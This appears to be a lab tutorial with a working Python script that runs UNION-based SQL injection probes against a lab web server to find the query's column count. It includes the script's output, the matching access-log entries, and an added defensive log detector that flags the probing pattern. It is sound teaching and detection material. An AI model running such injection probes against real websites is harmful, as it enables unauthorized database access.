Lab> Writing UNION attack code
1. Source code
-- requests03.py --
"""
File name   : requests03.py
Description : Example for a UNION attack
"""
import requests
import bs4
import time

id = 'bbs1 union select 1'
m = 'list'
agentValue = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
userAgent = {'User-Agent': agentValue}

# Each pass appends one more column (2, 3, ...) to the SELECT list, up to 50.
for i in range(1, 51):
    if i > 1:
        id = id + ',' + str(i)
    url = f"http://192.168.108.101/?id={id}&m={m}"  # URL to request
    r = requests.get(url, headers=userAgent)
    soup = bs4.BeautifulSoup(r.text, 'html.parser')
    # The script treats a response without a <b> element as a column-count match.
    if soup.find('b') is None:
        # The message below reads "UNION match OK!!!"
        print('UNION 매칭 OK!!!\n'
              f'{i} : {url} <<<')
        break
-- requests03.py --
2. Log analysis
# tail -f /var/log/httpd/server1.kr-access_log
:
:(omitted)
3. Run the script
Run the requests03.py file.
If the UNION attack succeeds, output like the following appears.
UNION 매칭 OK!!!
8 : http://192.168.108.101/?id=bbs1 union select 1,2,3,4,5,6,7,8&m=list <<<
4. Check the log
# tail -f /var/log/httpd/server1.kr-access_log
:
:(omitted)
192.168.108.1 - - [26/Jan/2022:19:22:47 +0900] "GET /?id=bbs1%20union%20select%201&m=list HTTP/1.1" 200 3550 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
192.168.108.1 - - [26/Jan/2022:19:22:47 +0900] "GET /?id=bbs1%20union%20select%201,2&m=list HTTP/1.1" 200 3554 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
192.168.108.1 - - [26/Jan/2022:19:22:47 +0900] "GET /?id=bbs1%20union%20select%201,2,3&m=list HTTP/1.1" 200 3558 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
192.168.108.1 - - [26/Jan/2022:19:22:47 +0900] "GET /?id=bbs1%20union%20select%201,2,3,4&m=list HTTP/1.1" 200 3562 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
192.168.108.1 - - [26/Jan/2022:19:22:47 +0900] "GET /?id=bbs1%20union%20select%201,2,3,4,5&m=list HTTP/1.1" 200 3566 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
192.168.108.1 - - [26/Jan/2022:19:22:47 +0900] "GET /?id=bbs1%20union%20select%201,2,3,4,5,6&m=list HTTP/1.1" 200 3570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
192.168.108.1 - - [26/Jan/2022:19:22:47 +0900] "GET /?id=bbs1%20union%20select%201,2,3,4,5,6,7&m=list HTTP/1.1" 200 3574 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
192.168.108.1 - - [26/Jan/2022:19:22:47 +0900] "GET /?id=bbs1%20union%20select%201,2,3,4,5,6,7,8&m=list HTTP/1.1" 200 4483 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
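Seen from the defender's side, the log above is a detectable pattern: one client sends UNION SELECT requests whose column list grows by one each time, and the response size jumps at the request that matches. The following is an added example, not part of the original post, that finds this pattern in combined-format access-log lines. The regexes, function names and the benign sample line are assumptions made for this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Apache combined log format: client, request target and response size are used.
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                     r'"\S+ (?P<target>\S+) [^"]*" \d{3} (?P<size>\d+|-)')
# UNION [ALL] SELECT followed by a comma-separated list of integer literals.
PROBE_RE = re.compile(r'\bunion\s+(?:all\s+)?select\s+(\d+(?:\s*,\s*\d+)*)', re.I)

# Sample input: probe lines for 5-8 columns from the log above (User-Agent
# shortened), preceded by one constructed benign request.
_T = '192.168.108.1 - - [26/Jan/2022:19:22:47 +0900] "GET /?id=bbs1{}&m=list HTTP/1.1" 200 {} "-" "Mozilla/5.0"'
SAMPLE_LOG = [_T.format(q, n) for q, n in [
    ('', 3540),  # constructed benign request
    ('%20union%20select%201,2,3,4,5', 3566),
    ('%20union%20select%201,2,3,4,5,6', 3570),
    ('%20union%20select%201,2,3,4,5,6,7', 3574),
    ('%20union%20select%201,2,3,4,5,6,7,8', 4483)]]

def find_union_probes(lines):
    """Return {client_ip: [(column_count, response_bytes), ...]} in log order."""
    probes = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        p = PROBE_RE.search(unquote_plus(m['target']))  # decode %20 / + first
        if p:
            size = 0 if m['size'] == '-' else int(m['size'])
            probes[m['ip']].append((p.group(1).count(',') + 1, size))
    return dict(probes)

def summarize(probes, min_steps=3):
    """Flag clients whose probes extend the column list one column at a time."""
    alerts = []
    for ip, seq in probes.items():
        cols = [c for c, _ in seq]
        if len(seq) < min_steps or any(b != a + 1 for a, b in zip(cols, cols[1:])):
            continue
        # Failed probes differ only by a few bytes; the request with the
        # largest size change is the likely column-count match.
        deltas = [abs(b[1] - a[1]) for a, b in zip(seq, seq[1:])]
        hit = seq[deltas.index(max(deltas)) + 1]
        alerts.append({'ip': ip, 'probes': len(seq), 'jump_at_columns': hit[0]})
    return alerts

if __name__ == '__main__':
    print(summarize(find_union_probes(SAMPLE_LOG)))
```

An alert whose `jump_at_columns` value is set means the application returned a materially different page to an injected query, so the `id` parameter handling should be reviewed and moved to parameterized queries.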